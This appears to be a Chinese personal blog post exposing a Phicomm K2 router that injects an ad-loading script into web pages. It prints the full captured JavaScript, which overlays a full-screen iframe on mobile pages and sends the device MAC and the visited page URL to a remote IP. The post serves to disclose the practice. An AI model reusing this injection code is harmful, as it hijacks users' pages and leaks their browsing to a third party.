最近一段时间,我大概有两三次留意到某些不可能有广告的网站竟然弹出了广告。今天得空一探究竟,意外发现我的路由器有猫腻:它每天会不定时地、以极低的频率给网页插入一段代码:

&lt;script src=http://222.73.156.145/587?MAC=747D240CC8C0&gt;&lt;/script&gt;

再访问地址 http://222.73.156.145/587?MAC=747D240CC8C0,得到如下 JS 代码:

(function () {
// Configuration for the injected ad loader. Every resource requested below is
// built from this base URL, which uses plain http.
var ip = 'http://222.73.156.145';
// Per-platform switches read by aa(): as shipped, an ad frame is built for
// user agents classified as Android or iOS, and the desktop ("pc") branch is off.
var pc = false;
var android = true;
var ios = true;
// The variables below are meant to be replaced by hand.
// NOTE(review): '587' and the MAC below match the path segment and MAC query
// value of the injected <script> URL shown in the write-up, so they are
// presumably filled in per device by the serving side; confirm.
var ad_customer = '587';
var mid = '561';
// Device MAC address; aa() appends it to the ad-frame URL as the MAC parameter.
var deviceMac = '74:7D:24:0C:C8:C0';
// Pull jQuery 1.11.2 from the same host into the visited page, then run aa()
// once that script has loaded and the DOM is ready.
loadExternResource({
scripts: [{tag: "script", url: ip + "/material/common/js/jquery-1.11.2.min.js"}],
callBack: function () {
// Wait until the DOM body has finished loading before inserting anything
$(function(){
//console.log(document.readyState);
aa();
})
}
});
/**
 * Appends external stylesheets and scripts to the page's <head> and, when a
 * callback is supplied, invokes it once every listed script has loaded.
 *
 * @param {Object} obj - Options; recognised keys are `links`, `scripts` and
 *   `callBack`. Each entry of `links` / `scripts` is read for its `url`.
 *   Entries of `scripts` are mutated: a `loadState` flag is written on them.
 */
function loadExternResource(obj) {
var elem, links, scripts, callBack, hasReadyState;
var head = document.getElementsByTagName("head")[0];
// Defaults; every own or inherited enumerable property of obj is copied over them.
var ObjOrg = {links: null, scripts: null, callBack: null};
for (var prop in obj) {
ObjOrg[prop] = obj[prop];
}
links = ObjOrg.links;
scripts = ObjOrg.scripts;
callBack = ObjOrg.callBack;
// Loose != undefined also excludes the null defaults above.
if (links != undefined) {
for (var i in links) {
elem = document.createElement("link");
elem.rel = "stylesheet";
elem.href = links[i].url;
head.appendChild(elem);
}
}
if (scripts != undefined) {
var load, loadHandle, loadCallBack;
// This first element is never appended; it is only probed below for readyState support.
elem = document.createElement("script");
elem.type = "text/javascript";
if (callBack != undefined) {
// Chooses between onreadystatechange and onload handlers further down.
hasReadyState = (elem.readyState != undefined);
// Marks one script as loaded and fires callBack only when none is still pending.
loadCallBack = function (index) {
scripts[index].loadState = true;
for (var j in scripts) {
if (false == scripts[j].loadState) {
return;
}
}
callBack();
};
for (var i in scripts) {
scripts[i].loadState = false;
}
}
// One <script> element per entry; the handler is attached before src is set.
for (var i in scripts) {
elem = document.createElement("script");
elem.type = "text/javascript";
if (callBack != undefined) {
if (hasReadyState) {
// The immediately-invoked wrapper captures the current index for the handler.
elem.onreadystatechange = (function (index) {
return function () {
if (this.readyState == "loaded" || this.readyState == "complete") {
// Detach so the script is reported as loaded only once.
this.onreadystatechange = null;
loadCallBack(index);
}
};
})(i);
} else {
elem.onload = (function (index) {
return function () {
loadCallBack(index);
};
})(i);
}
}
elem.src = scripts[i].url;
head.appendChild(elem);
}
}
}
/**
 * Returns the document's character set, reading document.characterSet when
 * getBrowser() reports "FIREFOX" and document.charset otherwise.
 * Not called anywhere else in this listing.
 *
 * @returns {string} The charset value read from the document.
 */
function getPageCharset() {
var charSet = "";
var oType = getBrowser();
switch (oType) {
case "IE":
charSet = document.charset;
break;
case "FIREFOX":
charSet = document.characterSet;
break;
default:
charSet = document.charset;
break;
}
return charSet;
}
/**
 * Classifies the browser from navigator.userAgent by substring match.
 *
 * @returns {string} "IE" when the UA contains "MSIE", "FIREFOX" when it
 *   contains "Firefox", otherwise the empty string.
 */
function getBrowser() {
var oType = "";
if (navigator.userAgent.indexOf("MSIE") != -1) {
oType = "IE";
} else if (navigator.userAgent.indexOf("Firefox") != -1) {
oType = "FIREFOX";
}
return oType;
}
/**
 * Builds the ad iframe for the detected platform and appends it to the <body>
 * of the top-level document.
 *
 * What a defender can observe from this function:
 *  - The frame URL is built from `ip` (plain http) and carries the device MAC
 *    (`MAC`) and the URL-encoded address of the page being visited (`hostUrl`),
 *    so both are sent to that host with every frame load.
 *  - The frame's id and name are "google_ads_frame2" although its src points at `ip`.
 *  - On the mobile branches the frame is position:fixed at top 0, 100% wide,
 *    z-index 2147483647, and is then resized to the window height.
 *
 * @returns {boolean|undefined} false when forbidHost() matches; otherwise nothing.
 */
function aa() {
/* $.get("http://" + ip + "/getIndex/"+ad_customer+"?MAC="+deviceMac, function(data){
ad_customer =data;
alert("material id"+ ad_customer);
});*/
// Added check for excluded domains: no ad is inserted on them
if(forbidHost()){
return false;
}
// Assigned without var/let/const, so hostUrl becomes an implicit global on the page.
// It holds the encoded URL of the top-level page the user is viewing.
hostUrl = encodeURIComponent(top.window.location.href);
// User-agent sniffing table. Only the android, ios, iPhone and iPad fields are read below.
var browser = {
versions: function () {
var u = navigator.userAgent, app = navigator.appVersion;
return {
trident: u.indexOf('Trident') > -1, // IE engine
presto: u.indexOf('Presto') > -1, // Opera engine
webKit: u.indexOf('AppleWebKit') > -1, // Apple / Google engine
gecko: u.indexOf('Gecko') > -1 && u.indexOf('KHTML') == -1, // Firefox engine
mobile: !!u.match(/AppleWebKit.*Mobile.*/) || !!u.match(/AppleWebKit/), // mobile device? (true for any AppleWebKit UA)
ios: !!u.match(/\(i[^;]+;( U;)? CPU.+Mac OS X/), // iOS device
android: u.indexOf('Android') > -1 || u.indexOf('Linux') > -1, // Android device or UC Browser; any UA containing "Linux" also matches
iPhone: u.indexOf('iPhone') > -1 || u.indexOf('Mac') > -1, // iPhone or QQ HD browser; any UA containing "Mac" also matches
iPad: u.indexOf('iPad') > -1, // iPad?
webApp: u.indexOf('Safari') == -1 // web app (no header/footer)?
};
}()
}
if (isWeiXin() || isAPP()) {
// No frame is built when the UA matches isWeiXin() or one of the tokens in isAPP().
} else if (browser.versions.android == true) { // Android only
if(android){
str_html = '<iframe id="google_ads_frame2" name="google_ads_frame2" frameborder="0" src="' + ip
+ '/res/' + mid + '/mobile_index.html?pushupdateid=' + ad_customer + '&MAC=' + deviceMac + '&hostUrl=' + hostUrl + '"'
+ 'marginwidth="0" marginheight="0" vspace="0" hspace="0" allowtransparency="true" scrolling="no" allowfullscreen="true" style="position:fixed; top: 0px; display: block; z-index: 2147483647; width: 100%;"></iframe>';
}
} else if (browser.versions.ios == true || browser.versions.iPhone == true || browser.versions.iPad == true) {
if(ios){
str_html = '<iframe id="google_ads_frame2" name="google_ads_frame2" frameborder="0" src="' + ip
+ '/res/' + mid + '/mobile_index.html?pushupdateid=' + ad_customer + '&MAC=' + deviceMac + '&hostUrl=' + hostUrl + '"'
+ 'marginwidth="0" marginheight="0" vspace="0" hspace="0" allowtransparency="true" scrolling="no" allowfullscreen="true" style="position:fixed; top: 0px; display: block; z-index: 2147483647; width: 100%;"></iframe>';
}
} else if (pc) {
// Desktop variant: a fixed 300x420 frame in the bottom-right corner. Disabled while pc is false.
str_html = '<iframe id="google_ads_frame2" name="google_ads_frame2" width="300px" ' +
'height="420px" frameborder="0" src="' + ip
+ '/res/' + mid + '/pc_index.html?pushupdateid=' + ad_customer + '&MAC=' + deviceMac + '&hostUrl=' + hostUrl + '"' +
' marginwidth="0" marginheight="0" vspace="0" hspace="0" allowtransparency="true" scrolling="no" allowfullscreen="true" style="position: fixed; display: block; z-index: 2147483647; height: 420px; overflow: visible; right: 5px; top: auto; bottom: 5px;"></iframe>';
} else {
}
// The frame goes into the top-level document's <body>. When no branch above
// assigned str_html, it is still undefined at this call.
$("body", window.top.document).append(str_html);
// Declared after use; var hoisting makes str_html a local for the whole function.
var str_html;
var docHeight;
docHeight = $(window).height();
// android is tested twice in this condition and the ios field is not consulted.
// Matching user agents get the frame stretched to the full window height.
if (browser.versions.android == true || browser.versions.android == true || browser.versions.iPhone == true || browser.versions.iPad == true) {
$("#google_ads_frame2").height(docHeight);
}
}
/**
 * Reports whether the user agent contains the "MicroMessenger" token
 * (the WeChat in-app browser). aa() builds no ad frame when this is true.
 *
 * @returns {boolean} true when the lower-cased UA matches /MicroMessenger/i.
 */
function isWeiXin() {
var ua = window.navigator.userAgent.toLowerCase();
//console.log(ua);//mozilla/5.0 (iphone; cpu iphone os 9_1 like mac os x) applewebkit/601.1.46 (khtml, like gecko)version/9.0 mobile/13b143 safari/601.1
// match() returns an array (or null); the loose == compares its string form with the literal.
if (ua.match(/MicroMessenger/i) == 'micromessenger') {
return true;
} else {
return false;
}
}
/**
 * Reports whether the lower-cased user agent contains any of a fixed list of
 * tokens. aa() builds no ad frame when this is true.
 * NOTE(review): the tokens look like in-app WebView identifiers; confirm
 * against real user-agent strings before relying on that reading.
 *
 * @returns {boolean} true when any listed token occurs in the UA, else false.
 */
function isAPP() {
var ua = window.navigator.userAgent.toLowerCase();
if (ua.indexOf("biliapp") >= 0) {
return true;
}
if (ua.indexOf("wifikey") >= 0) {
return true;
}
if (ua.indexOf("newsarticle") >= 0) {
return true;
}
if (ua.indexOf("peanutwi-fi") >= 0) {
return true;
}
if (ua.indexOf("phiwifi")>=0) {
return true;
}
if (ua.indexOf("changba") >= 0) {
return true;
}
if (ua.indexOf("momowebview") >= 0 || ua.indexOf("momokit") >= 0) {
return true;
} else {
return false;
}
}
// Domains on which the ad must not be shown; an array can be used later when more are added.
/**
 * Reports whether the top-level page URL is on the exclusion list, in which
 * case aa() returns without inserting anything.
 * The patterns are tested against the whole href, so they match anywhere in
 * the URL, not only in the host name.
 *
 * @returns {boolean} true when the URL contains "phicomm.com" or
 *   "m.baidu.com/static", else false.
 */
function forbidHost(){
var url = top.window.location.href;
// phicomm.com: the router vendor's own domain is exempt from insertion.
var reg = /phicomm\.com/g;
var baiduReg = /m\.baidu\.com\/static/g;
if(reg.test(url) || baiduReg.test(url)){
return true;
}else{
return false;
}
}
})();

我直接打电话给客服。客服一开始把我当小白,做了各种询问,最后很快地给了我一个官网未公开的固件版本:K2_V22.5.11.5.bin(目前官网最新的版本是 V22.5.9.163)。然而第二天发现,广告仍然存在。我真是太天真了。


回想了一下,我是在今年五月份买的斐讯路由器K2。之所以买这个路由器,是因为当初网络很不稳定,100M带宽还经常断网,网速也慢;除了运营商的问题,我还怀疑小米双频路由器也脱不了干系。于是在JD上搜了一下,下单了最热门的路由器,没想到就这么上了贼船。到了今天,我才有意识地关注斐讯。在知乎上搜索斐讯的名声,看到了《如何看待斐讯K2路由器0元购的推广手段?》,推测斐讯路由器当初之所以最热门,肯定跟这个推广活动有关;而活动过后,京东依然给这个K2路由器保留着最高的热度,于是我就这么稀里糊涂地相信了。同时,还搜到了关于斐讯的暴力裁员事件,我顿时吐了一口老血,特此一记。

啥都不省心,改天自己刷 OpenWrt!